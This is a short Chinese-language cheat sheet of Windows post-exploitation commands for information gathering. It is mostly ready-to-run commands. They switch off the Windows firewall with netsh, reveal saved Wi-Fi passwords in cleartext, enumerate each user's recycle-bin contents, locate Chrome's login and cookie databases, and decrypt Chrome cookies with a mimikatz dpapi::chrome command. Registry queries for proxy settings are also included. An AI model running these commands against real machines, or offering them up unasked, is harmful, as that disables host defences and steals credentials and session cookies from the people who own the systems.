# arp命令 arp -a arp -d#删除 inet_addr 指定的主机。inet_addr 可以是通配符 *,以删除所有主机。
防火墙信息收集
#关闭防火墙(Windows Server 2003 以前的版本) netsh firewall set opmode disable #关闭防火墙(Windows Server 2003 以后的版本) netsh advfirewall set allprofiles state off # 打开防火墙 netsh advfirewall set allprofiles state on # 关闭防火墙 netsh advfirewall set allprofiles state off
#查看防火墙配置(netsh命令也可以用作端口转发) netsh firewall show config #查看配置规则 netsh advfirewall firewall show rule name=all
# 查看防火墙状态 netsh #可让你以本地或远程方式显示或修改当前正在运行的计算机的网络配置 advfirewall # netsh下输入 show # netsh advfirewall下输入,显示查看防火墙的相关命令 show currentprofile # netsh advfirewall查看防火墙策略、防火墙日志状态等信息
#wifi密码 netsh wlan show profile netsh wlan show profile name="EEFUNG" key=clear
其他信息收集
#回收站内容获取 FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do dir /a /b C:\$Recycle.Bin\%d\ ^>%c.txt cd C:\$Recycle.Bin\S-1-5-21-3845785564-1101086751-683477353-1001\ $I 开头的文件保存的是路径信息 $R 开头的文件保存的是文件内容 #Chrome历史记录和Cookie获取 %localappdata%\google\chrome\USERDA~1\default\LOGIND~1 %localappdata%\google\chrome\USERDA~1\default\cookies chrome的用户信息,保存在本地文件为sqlite 数据库格式 mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer #通过pac文件自动代理情况 REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL